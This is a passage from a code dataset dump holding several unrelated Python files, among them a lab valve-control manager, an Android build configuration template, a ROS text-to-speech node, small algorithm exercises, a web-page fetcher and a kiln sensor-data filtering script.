self.isMonitoringValveState():\n self.info('monitor already running')\n else:\n t = Thread(target=func)\n t.start()\n self.info('starting status monitor')\n\n def isMonitoringValveState(self):\n return self._monitoring_valve_status\n# return self._update_status_flag.isSet()\n\n def bind_preferences(self):\n from apptools.preferences.preference_binding import bind_preference\n bind_preference(self.canvas, 'style', 'pychron.extraction_line.style')\n bind_preference(self.canvas, 'width', 'pychron.extraction_line.width')\n bind_preference(self.canvas, 'height', 'pychron.extraction_line.height')\n\n bind_preference(self, 'enable_close_after', 'pychron.extraction_line.enable_close_after')\n bind_preference(self, 'close_after_minutes', 'pychron.extraction_line.close_after')\n\n# from src.extraction_line.plugins.extraction_line_preferences_page import get_valve_group_names\n#\n# for name in get_valve_group_names():\n# self.add_trait(name, Str(''))\n# self.on_trait_change(self._owner_change, name)\n# bind_preference(self, name, 'pychron.extraction_line.{}'.format(name))\n\n def _owner_change(self, name, value):\n self.valve_manager.claim_section(name.split('_')[0], value.lower)\n\n def reload_scene_graph(self):\n iddict = dict()\n # remember the explanation settings\n exp = self.explanation\n if exp:\n for ev in exp.explanable_items:\n i = ev.identify\n iddict[ev.name] = i\n\n if self.canvas is not None:\n if self.canvas.style == '2D':\n p = os.path.join(paths.canvas2D_dir, 'canvas.xml')\n self.canvas.load_canvas_file(p)\n# else:\n# self.canvas.canvas3D.setup() # canvas3D_dir, 'extractionline3D.txt')\n# if self.canvas.style == '2D':\n# # self.canvas.invalidate_and_redraw()\n# else:\n# if self.canvas is not None:\n\n # load state\n if self.valve_manager:\n for k, v in self.valve_manager.valves.iteritems():\n vc = self.canvas.get_object(k)\n if vc:\n vc.soft_lock = v.software_lock\n v.canvas_valve = vc\n# vc.state = v.state\n\n try:\n vc.identify = iddict[vc.name]\n except:\n pass\n\n# self.canvas.Refresh()\n# self.view_controller = self._view_controller_factory()\n\n def load_canvas(self):\n '''\n '''\n p = self._file_dialog_('open', **dict(default_dir=paths.canvas2D_dir))\n\n if p is not None:\n self.canvas.load_canvas(p)\n\n# def pressure_update(self, o, oo, n):\n# '''\n# on_trait_change handler for gauge_manager.gauges.pressure\n#\n# '''\n# if self.canvas:\n# self.canvas.update_pressure(o.name, n, o.state)\n def update_valve_state(self, *args, **kw):\n if self.canvas:\n self.canvas.update_valve_state(*args, **kw)\n\n def update_valve_lock_state(self, *args, **kw):\n if self.canvas:\n self.canvas.update_valve_lock_state(*args, **kw)\n\n# def update_canvas2D(self, *args):\n# if self.canvas:\n# self.canvas.canvas2D.update_valve_state(*args)\n\n def show_valve_properties(self, name):\n if self.valve_manager is not None:\n self.valve_manager.show_valve_properties(name)\n\n def get_software_lock(self, name, **kw):\n if self.valve_manager is not None:\n return self.valve_manager.get_software_lock(name, **kw)\n\n def set_software_lock(self, name, lock):\n if self.valve_manager is not None:\n if lock:\n self.valve_manager.lock(name)\n else:\n self.valve_manager.unlock(name)\n\n def get_valve_lock_states(self):\n if self.valve_manager is not None:\n return self.valve_manager.get_software_locks()\n\n def get_valve_state(self, name=None, description=None):\n if self.valve_manager is not None:\n if description is not None and description.strip():\n return self.valve_manager.get_state_by_description(description)\n else:\n return self.valve_manager.get_state_by_name(name)\n\n def get_valve_states(self):\n if self.valve_manager is not None:\n return self.valve_manager.get_states()\n\n def get_valve_by_name(self, name):\n if self.valve_manager is not None:\n return self.valve_manager.get_valve_by_name(name)\n\n# def open_valve(self, name, description=None, address=None, mode='remote', **kw):\n def get_pressure(self, controller, name):\n if self.gauge_manager:\n return self.gauge_manager.get_pressure(controller, name)\n\n def disable_valve(self, description):\n self._enable_valve(description, False)\n\n def enable_valve(self, description):\n self._enable_valve(description, True)\n\n def _enable_valve(self, description, state):\n if self.valve_manager:\n valve = self.valve_manager.get_valve_by_description(description)\n if valve is None:\n valve = self.valve_manager.get_valve_by_name(description)\n\n if valve is not None:\n if not state:\n self.close_valve(valve.name)\n\n valve.enabled = state\n\n\n def open_valve(self, name, ** kw):\n '''\n '''\n return self._open_close_valve(name, 'open', **kw)\n\n def close_valve(self, name, **kw):\n '''\n '''\n return self._open_close_valve(name, 'close', **kw)\n\n def _open_close_valve(self, name, action,\n description=None, address=None, mode='remote', **kw):\n vm = self.valve_manager\n if vm is not None:\n if address:\n name = vm.get_name_by_address(address)\n\n if description and description != '---':\n name = vm.get_name_by_description(description)\n\n result = self._change_valve_state(name, mode, action, **kw)\n\n# if self.learner:\n# self.learner.open_close_valve(name, action, result)\n\n return result\n\n def sample(self, name, **kw):\n def sample():\n valve = self.valve_manager.get_valve_by_name(name)\n if valve is not None:\n self.info('start sample')\n self.open_valve(name, **kw)\n time.sleep(valve.sample_period)\n\n self.info('end sample')\n self.close_valve(name, **kw)\n\n t = Thread(target=sample)\n t.start()\n\n def cycle(self, name, **kw):\n def cycle():\n\n valve = self.valve_manager.get_valve_by_name(name)\n if valve is not None:\n n = valve.cycle_n\n period = valve.cycle_period\n\n self.info('start cycle n={} period={}'.format(n, period))\n for i in range(n):\n self.info('valve cycling iteration ={}'.format(i + 1))\n self.open_valve(name, **kw)\n time.sleep(period)\n self.close_valve(name, **kw)\n time.sleep(period)\n\n t = Thread(target=cycle)\n t.start()\n\n def claim_group(self, *args):\n return self.valve_manager.claim_group(*args)\n\n def release_group(self, *args):\n return self.valve_manager.release_group(*args)\n\n def _change_valve_state(self, name, mode, action, sender_address=None):\n\n func = getattr(self.valve_manager, '{}_by_name'.format(action))\n\n# owned = False\n# try:\n# claimer = self.valve_manager.get_system(sender_address)\n# if claimer:\n# owned = self.valve_manager.check_group_ownership(name, claimer)\n# except AttributeError:\n# #no systems are defined\n# pass\n\n result, change = func(name, mode=mode)\n# change = False\n# if not owned:\n# result, change = func(name, mode=mode)\n# else:\n# result = '{} owned by {}'.format(name, claimer)\n# self.warning(result)\n\n# system,f ok = self.valve_manager.check_ownership(name, sender_address)\n# # ok = True\n# if ok:\n# critical = self.valve_manager.check_critical_section()\n# if not critical:\n# result = func(name, mode=mode)\n# else:\n# result = '{} critical section enabled'.format(name)\n# self.warning(result)\n# else:\n if isinstance(result, bool):\n # valve state show as changed if even it didnt actuate\n# if result:\n if change:\n self.canvas.update_valve_state(name, True if action == 'open' else False)\n# result = True\n\n return result, change\n\n# def execute_run_script(self, runscript_name):\n# runscript_dir = os.path.join(paths.scripts_dir, 'runscripts')\n# if self.runscript is None:\n# e = ExtractionLineScript(source_dir=runscript_dir ,\n# file_name=runscript_name,\n# manager=self,\n#\n# )\n#\n# e.bootstrap()\n# elif self.runscript.isAlive():\n# self.warning('{} already running'.format(runscript_name))\n# else:\n# self.runscript = None\n\n def execute_pyscript(self, name):\n if not name.endswith('.py'):\n name += '.py'\n\n p = os.path.join(paths.scripts_dir, 'pyscripts', name)\n if not os.path.isfile(p):\n return p\n\n pe = self.pyscript_editor\n return pe.execute_script(path=p)\n\n def get_script_state(self, key):\n return self.pyscript_editor.get_script_state(key)\n\n def set_selected_explanation_item(self, obj):\n if self.explanation:\n selected = next((i for i in self.explanation.explanable_items if obj.name == i.name), None)\n if selected:\n self.explanation.selected = selected\n\n def traits_view(self):\n '''\n '''\n v = View(\n VSplit(\n Item('gauge_manager',\n style='custom', show_label=False,\n height=0.2,\n springy=False,\n defined_when='gauge_manager'\n ),\n Item('canvas',\n style='custom',\n show_label=False,\n height=0.8)\n ),\n handler=self.handler_klass,\n title='Extraction Line Manager',\n resizable=True,\n id='pychron.extraction_line_window'\n )\n return v\n\n#=================== factories ==========================\n\n def _view_controller_factory(self):\n if self.canvas.canvas3D:\n v = ViewController(scene_graph=self.canvas.canvas3D.scene_graph)\n self.canvas.canvas3D.user_views = v.views\n return v\n\n def _valve_manager_changed(self):\n e = self.explanation\n if self.valve_manager is not None and e is not None:\n e.load(self.valve_manager.explanable_items)\n self.valve_manager.on_trait_change(e.load_item, 'explanable_items[]')\n# self.valve_manager.mode = self.mode\n#=================== defaults ===========================\n# def _view_controller_default(self):\n# return self._view_controller_factory()\n def _pyscript_editor_default(self):\n return PyScriptManager(parent=self)\n\n def _valve_manager_default(self):\n from src.extraction_line.valve_manager import ValveManager\n return ValveManager(extraction_line_manager=self)\n\n# def _gauge_manager_default(self):\n# from src.extraction_line.gauge_manager import GaugeManager\n# return GaugeManager()\n\n def _explanation_default(self):\n# '''\n# '''\n e = ExtractionLineExplanation()\n if self.valve_manager is not None:\n e.load(self.valve_manager.explanable_items)\n self.valve_manager.on_trait_change(e.load_item, 'explanable_items[]')\n\n return e\n\n def _canvas_default(self):\n '''\n '''\n return ExtractionLineCanvas(manager=self)\n\n# def _pumping_monitor_default(self):\n# '''\n# '''\n# return PumpingMonitor(gauge_manager=self.gauge_manager,\n# parent=self)\n\n# def _multruns_report_manager_default(self):\n# return MultrunsReportManager(application=self.application)\nif __name__ == '__main__':\n elm = ExtractionLineManager()\n elm.bootstrap()\n elm.canvas.style = '2D'\n elm.configure_traits()\n\n#=================== EOF ================================\n# def add_extraction_line_macro_delay(self):\n# global Macro\n# if Macro is None:\n# from macro import _Macro_ as Macro\n#\n# info = Macro.edit_traits()\n# if info.result:\n# Macro.record_action(('delay', Macro.delay))\n#\n# def stop_extraction_line_macro_recording(self):\n# global stop_recording\n# if stop_recording is None:\n# from macro import stop_recording\n# stop_recording()\n#\n# def start_extraction_line_macro_recording(self):\n# global start_recording\n# if start_recording is None:\n# from macro import start_recording\n# start_recording()\n#\n# def play_extraction_line_macro_recording(self):\n# #lazy pre_start time and Thread\n# global time\n# if time is None:\n# import time\n#\n# global Thread\n# if Thread is None:\n# from threading import Thread\n#\n# global play_macro\n# if play_macro is None:\n# from macro import play_macro\n#\n# def _play_():\n# for c in play_macro():\n# args = c[0]\n# kw = c[1]\n#\n# if args == 'delay':\n#\n# time.sleep(kw)\n# else:\n# action = args[3]\n# name = args[1]\n#\n# func = getattr(self, '%s_valve' % action)\n# func(name, mode = 'manual')\n#\n# t = Thread(target = _play_)\n# t.start()\n","sub_path":"src/extraction_line/extraction_line_manager.py","file_name":"extraction_line_manager.py","file_ext":"py","file_size_in_byte":21322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"154611540","text":"def dfs(x,y):\n if x<=-1 or x>=n or y<=-1 or y>=m:\n return False\n \n if route[x][y]==0:\n route[x][y]=1\n\n dfs(x-1,y)\n dfs(x,y-1)\n dfs(x+1,y)\n dfs(x,y+1)\n return True\n return False\n\n\nn,m = map(int, input().split())\n\nroute=[list(map(int,input())) for _ in range(n)]\n\n\nresult = 0\n\nfor i in range(n):\n for j in range(m):\n if dfs(i,j)==True:\n result+=1\n\n\nprint(result)","sub_path":"BFS&DFS/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"396666323","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom Biuploy._config.conf import PACKGETIME\n\n#1.check\n#if true deploy or not ; True / False\nDEBUG = True\n\n#2.检查代码使用版本号\n#source svn version like 750\nSOURCE_VERSION = None\n\n#3.检查安装包为主线还是企业\n#build mode 'main'/'client'\nBUILD_MODE = 'main'\n\n#4.检查打包的部署方式\n#deploy mode 'old'/'test'/'cloud'/'custom'\nDEPLOY_MODE = 'cloud'\n\n#5.检查使用的主线版本\n#main version like '5.2'\nMAIN_VERSION = '5.2'\n\n#6.检查主线轮次号\n#main release like 4\nMAIN_RELEASE = 5\n\n#7.检查主线升级号\n#main build number like 80\nMAIN_BUILD = 74\n\n#8.检查企业版轮次号\n#client release like 4\nCLIENT_RELEASE = 4\n\n#9.检查企业版升级号\n#client build like 80\nCLIENT_BUILD = 83\n\n#10.检查企业版版本号\n#client release like 140\nCLIENT_VERSION = 34\n\n#11.检查Ip地址,如果为custom,注意配置Ip\n#ip setting begin\nCLOUD_IP = 'xuanxun.chinacloudapp.cn'\n\nTEST_IP = '120.132.147.140'\n\nOLD_ENTERIP1 = '211.147.238.57'\n\nOLD_ENTERIP2 = '211.155.27.54'\n\nOLD_SERVERIP = '211.147.238.68'\n\nCUSTOM_FUZAI_IP = None\n\nCUSTOM_SERVER_IP = None\n\nCUSTOM_ENTERPRICE_IP = None\n#ip setting end\n\n#12.检查apk中的企业缩写\n#enterprice name like 'hehuang'\nCLIENT_NAME = None\n\n#13.检查企业名称\n#enterprice name like u'娃哈哈'\nENTERPRICE_NAME = None\n\n#14.检查企业升级地址\n#enterpirce update url like 'http://211.155.27.212/soft/'\nUPDATE_URL = None\n\n#14.检查企业热线电话\n#enterprice phone like '10086'\nENTERPRICE_PHONE = None\n\n#15.检查服务热线描述是否要修改\n#enterprice phone call like '百度服务热线'\nENTERPRICE_NUM_TIPS = None\n\n#16.检查本次的代码存放地址\n#source url like 'D:/trunk/source'\nSOURCE_URL = 'D:/trunk/source/'\n\n\n\n\nimport os\n#self dir\nSELF_URL = os.getcwd() + '/Biuploy/_config/ant_config_default.py'\n#config template\nCONFIG_TMP = os.getcwd() + '/Biuploy/_src/ant_config_template.py'\n\n#setting the configs begin\nif BUILD_MODE == 'main':\n VERSION_NAME = 'XtionKX_A001_' + MAIN_VERSION + '.' + str(MAIN_RELEASE) + '.' + str(MAIN_BUILD)\n APK_NAME = 'xtion_' + MAIN_VERSION + '.' + str(MAIN_RELEASE) + '.apk'\n VERSION_NO = '6'\n BUILD_NO = MAIN_BUILD\n SVN_URL = 'http://192.168.1.245:9000/xtionkx/trunk/android/xtion'\nelif BUILD_MODE == 'client':\n VERSION_NAME = 'Android V' + MAIN_VERSION + ' ' + str(MAIN_BUILD) + '[' + str(CLIENT_VERSION) +']' + '[' + str(CLIENT_BUILD) + ']'\n APK_NAME = 'xtion_' + CLIENT_NAME + '_' + MAIN_VERSION + '.' + str(CLIENT_RELEASE) + '.apk'\n VERSION_NO = str(CLIENT_VERSION)\n BUILD_NO = CLIENT_BUILD\n SVN_URL = 'http://192.168.1.245:9000/xtionkx/branches/android/xtion5.2/xtion'\n#setting the configs end\n\n#main app url\nMAINAPP = SOURCE_URL + 'xtion/'\n\n#app dependencies\nDEPEND = ['actionbar_4.4/', 'asmack/', 'google_zxing/', 'XtionCamera/']\n\nDEPENDENCIES = [SOURCE_URL + x for x in DEPEND]\n\nfrom Biuploy._build.build import Ant\nBUILD_ENV = {\n 'MAINAPP' : MAINAPP,\n 'DEPEND' : DEPEND,\n 'DEPENDENCIES' : DEPENDENCIES,\n 'APK_NAME' : APK_NAME,\n 'BUILDTOOL' : Ant,\n}\n\n#setting the ip begin\nif DEPLOY_MODE == 'old' or DEPLOY_MODE == 'cloud':\n FUZAI = 'true'\n if DEPLOY_MODE == 'old':\n MULTISERVER = '0'\n ENTERIPSERVER1 = OLD_ENTERIP1\n ENTERIPSERVER2 = OLD_ENTERIP2\n SERVERIP = OLD_SERVERIP\n ENTERIP = OLD_SERVERIP \n else:\n MULTISERVER = '1'\n ENTERIPSERVER1 = CLOUD_IP\n ENTERIPSERVER2 = CLOUD_IP\n SERVERIP = CLOUD_IP\n ENTERIP = CLOUD_IP \nelif DEPLOY_MODE == 'test' or DEPLOY_MODE == 'custom':\n FUZAI = 'false'\n MULTISERVER = '1'\n if DEPLOY_MODE == 'test':\n ENTERIPSERVER1 = TEST_IP\n ENTERIPSERVER2 = TEST_IP\n SERVERIP = TEST_IP\n ENTERIP = TEST_IP\n else:\n ENTERIPSERVER1 = CUSTOM_FUZAI_IP\n ENTERIPSERVER2 = CUSTOM_FUZAI_IP\n SERVERIP = CUSTOM_SERVER_IP\n ENTERIP = CUSTOM_ENTERPRICE_IP\n#setting the ip end\n\n#config file begin\nfrom Biuploy.util import update_xml_file, update_normal_file, encode_file_to_utf8\n\nXML = update_xml_file\n\nNFILE = update_normal_file\n\nENCODE = encode_file_to_utf8\n\nCONFIG_FILE = [\n {\n 'NAME':'configs.xml',\n 'ADDR': MAINAPP + 'src/',\n 'FUNC': XML,\n 'ISNEED': True,\n 'MODPROP': 'value',\n 'PARAMS': {\n 'MULTI_SERVER': MULTISERVER,\n 'BUILDNO': str(BUILD_NO),\n 'VERSIONNO': str(VERSION_NO),\n 'camera_mode': None,\n 'DEL_FILE': None,\n 'isFuzai': FUZAI,\n 'is_open_xmpp': None,\n 'help_url': None,\n 'is_login_more': None,\n 'home_category': None,\n 'chat_func_isdisplay': None,\n 'custom_addressbook_fuc_isdisplay': None,\n 'locate_service': None,\n 'locate_service_time': None,\n 'BESTENTERPRISESERVERS_IP': ENTERIPSERVER1,\n 'BESTENTERPRISESERVERS_IP_1': ENTERIPSERVER2,\n 'SERVER_IP': SERVERIP,\n 'ENTERPRICE_IP': ENTERIP,\n 'SERVER_PORT': None,\n 'ENTERPRICE_PORT': None,\n 'TARGET_UPLOAD_PORT': None,\n 'UPLOAD_PORT': None,\n 'TEST_PORT': None,\n 'PROXY_UP_TEST_PORT': None,\n 'BESTENTERPRISESERVERS_PORT': None,\n 'XWNUMBER': ENTERPRICE_PHONE,\n 'UPDATE_URL': UPDATE_URL,\n 'PACKGETIME': str(PACKGETIME),\n }\n },{\n 'NAME': 'strings.xml',\n 'ADDR': MAINAPP + 'res/values/',\n 'FUNC': XML,\n 'ISNEED': True,\n 'MODPROP': 'text',\n 'PARAMS': {\n 'app_name': ENTERPRICE_NAME,\n 'android_etion': ENTERPRICE_NAME,\n 'enterprise_num_tips': ENTERPRICE_NUM_TIPS,\n 'xw_number': ENTERPRICE_PHONE,\n }\n },{\n 'NAME': 'AndroidManifest.xml',\n 'ADDR': MAINAPP,\n 'FUNC': NFILE,\n 'ISNEED': True,\n 'BYRE': True,\n 'PARAMS': {\n r'(android:versionName=\".*?\")': 'android:versionName=\"'+VERSION_NAME+'\"',\n r'(android:versionCode=\".*?\")': 'android:versionCode=\"0\"',\n }\n },{\n 'NAME': 'Consts.java',\n 'ADDR': MAINAPP + 'src/com/xuanwu/xtion/config/',\n 'FUNC': NFILE,\n 'ISNEES': True,\n 'BYRE': True,\n 'PARAMS': {\n '(PACKGETIME = \".*?\")': 'PACKGETIME = \"'+str(PACKGETIME)+'\"',\n }\n },{\n 'FUNC': ENCODE,\n 'FILELIST': [\n SOURCE_URL + 'google_zxing/src/com/google/zxing/client/android/ViewfinderView.java',\n SOURCE_URL + 'google_zxing/src/com/google/zxing/client/android/CaptureActivity.java',\n SOURCE_URL + 'actionbar_4.4/src\\com/viewpagerindicator/LazyViewPager.java',\n SOURCE_URL + 'xtion/res/values/strings.xml',\n SOURCE_URL + 'xtion/src/com/xuanwu/xtion/config/Consts.java',\n SOURCE_URL + 'xtion/src/com/xuanwu/xtion/ui/base/SystemFragment.java',\n SOURCE_URL + 'xtion/src/com/xuanwu/xtion/ui/LoginActivity.java' \n ]\n\n }\n]\n#config file end\n\n#logo addr begin\nLOGO_SETTING = [{\n 'VERSION_NO' : VERSION_NO,\n 'CHANGELOGO' : True if BUILD_MODE == 'client' else False,\n 'DEST_LOGO_URL' : u'E:/configmanage/interprice_logo/',\n 'SOURCE_LOGO_URL' : MAINAPP + 'res/',\n},]\n#logo addr end\n\n#svn conf begin\nSVN_CONF = {\n 'RMV_FOLDER' : MAINAPP,\n 'DEST_URL' : SOURCE_URL,\n 'SVN_URL' : SVN_URL,\n 'SOURCE_VERSION' : SOURCE_VERSION,\n}\n#svn conf end","sub_path":"_src/ant_config_template.py","file_name":"ant_config_template.py","file_ext":"py","file_size_in_byte":8329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"96549648","text":"#!/usr/bin/env python\n\nfrom sound_play.libsoundplay import SoundClient\nfrom sound_play.msg import SoundRequest\nfrom std_msgs.msg import String\n\nimport rospy\n\nclass Speaker(object):\n def __init__(self, sound_handle, voice):\n self._sound_handle = sound_handle\n self._voice = voice \n \n def speak(self, msg):\n self._sound_handle.say(msg.data, self._voice)\n \ndef main():\n rospy.init_node('sound_play_tts')\n sound_handle = SoundClient()\n voice = 'voice_kal_diphone'\n speaker = Speaker(sound_handle, voice)\n rospy.Subscriber('text_to_speech', String, speaker.speak)\n \n rospy.spin()\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/tts_node.py","file_name":"tts_node.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"535451077","text":"class Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n result = nums[-1]\n for i in range(len(nums)-2, -1, -1):\n nums[i] = max(nums[i], nums[i] + nums[i+1])\n result = max(result, nums[i])\n return result\n\n#TC: O(n)\n#SC: O(1)\n","sub_path":"Array_4_2.py","file_name":"Array_4_2.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"468692104","text":"#!/usr/bin/env python\n\n'''\nThis basic example shows use of the Python Pillow library:\n\nsudo pip-3.2 install pillow # or sudo pip install pillow\n\nThe tiny 8x8 chars in lofi.png are from Oddball:\nhttp://forums.tigsource.com/index.php?topic=8834.0\n\nLicensed under Creative Commons Attribution-Noncommercial-Share Alike 3.0 Unported License.\n'''\n\nimport signal\nimport time\n\ntry:\n import numpy\nexcept ImportError:\n exit(\"This script requires the numpy module\\nInstall with: sudo pip install numpy\")\n\ntry:\n from PIL import Image\nexcept ImportError:\n exit(\"This script requires the pillow module\\nInstall with: sudo pip install pillow\")\n\nimport unicornhat as unicorn\n\nunicorn.set_layout(unicorn.AUTO)\nunicorn.rotation(0)\nunicorn.brightness(0.5)\n\nimg = Image.open('heart.png')\nprint(img)\n\nfor y in range(img.size[1]):\n for x in range(img.size[0]):\n pixel = img.getpixel((x,y))\n # print(pixel)\n r, g, b, a = int(pixel[0]),int(pixel[1]),int(pixel[2]), int(pixel[3])\n # r, g, b, a = 255, 255, 255, 255\n unicorn.set_pixel(x + 1, y, a, 0, 0)\n print(x, y, r, g, b, a)\nunicorn.show()\ntime.sleep(1.0)\n","sub_path":"heart.py","file_name":"heart.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"433148750","text":"# 使用requests库获取猫眼电影前10热门,并保存为网页\n# Created by Xiaozhen Liu. Edited on 2020/06/28 09:59 UTC+\n\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'\n\nheader = {'user-agent':user_agent}\n\nmyurl = 'https://maoyan.com/films?showType=3'\n\nresponse = requests.get(myurl,headers=header)\n\nfname = 'maoyan_response.html'\nwith open(fname, 'w',encoding='utf-8') as file_object:\n file_object.write(response.text)\n\nprint(f'返回码是: {response.status_code}')","sub_path":"week01/homework1-1/week1_requests.py","file_name":"week1_requests.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"460382438","text":"'''\n\n目前汤总的意思是这样的,我们只保留最为稳定的那类数据,\n不按照绝对值时间来删数据,按照比例来删,比如两次调整之间的时间是1个小时,那么我们只留中间20分钟的数据。\n如果两次调整的间隔时间小于1小时,就删掉这批数据。\n\n汤总还说进一步缩减数据变化,使用30秒间隔、1分钟间隔,5分钟间隔的数据分别试试看。\n30秒的看不出来,那就1分钟的数据,取一条,1分钟间隔就是1分钟取一条,5分钟取一条。取平均值吧\n\n一分钟内就60个数的平均这样\n所有的数值只要是数值类型 我就平均下\n\n'''\nimport csv\nfrom datetime import datetime, timedelta\n\n\ntarge_filename = \"HBYC_Line2_Kiln_2021_Jan_12_28.csv\"\n\npath = \"HXData/\" + targe_filename\n\n#实际处理 注释掉这行\n# path = \"HXDataSample/\" + targe_filename\n\nnewpath = \"HXProcessedData/\" + targe_filename\ndelpath = \"HXDelete/\" + targe_filename\nbufsize = 65536*6*5\n#实际处理 注释掉这行\n# bufsize = 5000\n\n#窑味料量\n# Feeding_index = 28\n\n# 本次只考虑使用头煤 HeadCoal_index\nHeadCoal_index = 29\n\ndef process(lines):\n time_need_removed = []\n rows = []\n del_rows = []\n for i in range(0, len(lines)):\n\n items = lines[i].split(',')\n if items[0] not in ('timestamp'):\n # d = datetime.strptime(items[0], \"%Y/%m/%d %H:%M:%S\")\n try:\n d = datetime.strptime(items[0], \"%Y/%m/%d %H:%M:%S\")\n except:\n d = datetime.strptime(items[0], \"%Y/%m/%d %H:%M\")\n del_flag = True\n for span in filter_spans:\n if d >= span[0] and d <= span[1]:\n rows.append(lines[i])\n del_flag = False\n if del_flag:\n del_rows.append(lines[i])\n return rows, del_rows\n \n\n\n\n\ntime_points_of_changes = []\nfilter_spans = []\n\ndef scan_for_change(lines):\n global time_change\n\n for i in range(0, len(lines)):\n\n # print(\"窑喂料量Kiln_Feed_SP=\", lines[i][28], 'Kiln_Burner_Coal_SP头煤=',lines[i][29])\n if i - 1 >= 0 and i + 1 < len(lines):\n # result = handleline(lines[i - 1], lines[i], lines[i + 1], lines[i + 2])\n items = lines[i].split(',')\n items_prev = lines[i-1].split(',')\n items_next = lines[i+1].split(',')\n if (items_prev[HeadCoal_index] not in ('Kiln_Burner_Coal_SP', '头煤') and \\\n items_prev[HeadCoal_index] != items[HeadCoal_index] and \\\n items_prev[HeadCoal_index] != items_next[HeadCoal_index]):\n if items[0] not in time_points_of_changes:\n time_points_of_changes.append(items[0])\n print(items[0], ' changes!')\n\ndef main():\n global filter_spans\n\n with open(path, encoding=\"UTF-8\") as infile:\n while True:\n lines = infile.readlines(bufsize)\n\n if not lines:\n break\n rows = scan_for_change(lines)\n print(len(time_points_of_changes), time_points_of_changes[0:10])\n\n small_delta = timedelta(\n days=0,\n seconds=0,\n microseconds=0,\n milliseconds=0,\n minutes=0,\n hours=1,\n weeks=0\n )\n # 找出想要保留的时间区间列表\n for i in range(0, len(time_points_of_changes)):\n if i + 1 < len(time_points_of_changes):\n try:\n d = datetime.strptime(time_points_of_changes[i], \"%Y/%m/%d %H:%M:%S\")\n except:\n d = datetime.strptime(time_points_of_changes[i], \"%Y/%m/%d %H:%M\")\n\n try:\n d_next = datetime.strptime(time_points_of_changes[i+1], \"%Y/%m/%d %H:%M:%S\")\n except:\n d_next = datetime.strptime(time_points_of_changes[i+1], \"%Y/%m/%d %H:%M\")\n # print(time_points_of_changes[i], time_points_of_changes[i+1])\n span = d_next - d\n print('#'*10, d, d_next)\n print(span, '@'*5, d+(span/3), d+(span*2/3))\n if span >= small_delta:\n filter_spans.append((d+(span/3), d+(span*2/3)))\n\n with open('i2filter_spans.txt', 'w') as filehandle:\n for listitem in filter_spans:\n filehandle.write(\"'{0}'#'{1}'\".format(listitem[0], listitem[1]))\n filehandle.write('\\n')\n\n print('\\n')\n # print(filter_spans[0][0], filter_spans[0][1])\n with open(path, encoding=\"UTF-8\") as infile:\n while True:\n lines = infile.readlines(bufsize)\n print('len(lines)=', len(lines))\n if not lines:\n break\n\n rows, delrows = process(lines)\n print('len(rows)=', len(rows), 'len(delrows)=', len(delrows))\n # print('process len(rows)=', len(rows), rows, '-'*10, '\\n')\n # for r in rows:\n # print(r, '#'*10, '\\n')\n with open(newpath, \"a\", newline='') as csvfile: \n writer = csv.writer(csvfile) \n\n # if write_count == 0:\n # writer.writerow(header)\n # write_count += 1\n for row in rows:\n writer.writerow(row.split(','))\n\n\n with open(delpath, \"a\", newline='') as dcsvfile: \n writer = csv.writer(dcsvfile) \n\n for drow in delrows:\n writer.writerow(drow.split(','))\nif __name__ == \"__main__\":\n main()\n","sub_path":"i2rm_jump_points.py","file_name":"i2rm_jump_points.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"141822006","text":"\nimport time,threading\n\nclass Singleton:\n __instance = None\n sleepTime = 1\n executeThread = False\n\n def __init__(self):\n if Singleton.__instance != None:\n raise Exception(\"This class is a singleton!\")\n else:\n Singleton.__instance = self\n\n @staticmethod\n def getInstance():\n if Singleton.__instance == None:\n Singleton()\n return Singleton.__instance\n\n\n def startThread(self):\n self.executeThread = True\n self.threadNew = threading.Thread(target=self.foo_target)\n self.threadNew.start()\n print('doing other things...')\n\n\n def stopThread(self):\n print(\"Killing Thread \", self)\n print(self.threadNew)\n self.executeThread = False\n self.threadNew.join()\n\n def foo(self):\n print(\"Hello in \" + str(self.sleepTime) + \" seconds\")\n\n def foo_target(self):\n while self.executeThread:\n self.foo()\n print(self.threadNew)\n time.sleep(self.sleepTime)\n\n if self.executeThread == False:\n break\n\n\n\n\nsClass = Singleton()\nsClass.startThread()\ntime.sleep(5)\nsClass.getInstance().stopThread()\n\nsClass.getInstance().sleepTime = 2\nsClass.startThread()\n\n# sClass.getInstance().sleepTime = 2\n# time.sleep(5)\n\n# time.sleep(5)\n# sClass.getInstance().sleepTime = 3\n# sClass.foo()\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"SignletonThread.py","file_name":"SignletonThread.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"177501419","text":"#\n# Use k-means clustering to find the most-common colors in an image\n#\nimport cv2, time\nimport numpy as np\nfrom sklearn.cluster import KMeans\n\n# Class definition\ndef make_histogram(cluster):\n \"\"\"\n Count the number of pixels in each cluster\n :param: KMeans cluster\n :return: numpy histogram\n \"\"\"\n numLabels = np.arange(0, len(np.unique(cluster.labels_)) + 1)\n hist, _ = np.histogram(cluster.labels_, bins=numLabels)\n hist = hist.astype('float32')\n hist /= hist.sum()\n return hist\n\n\ndef make_bar(height, width, color):\n \"\"\"\n Create an image of a given color\n :param: 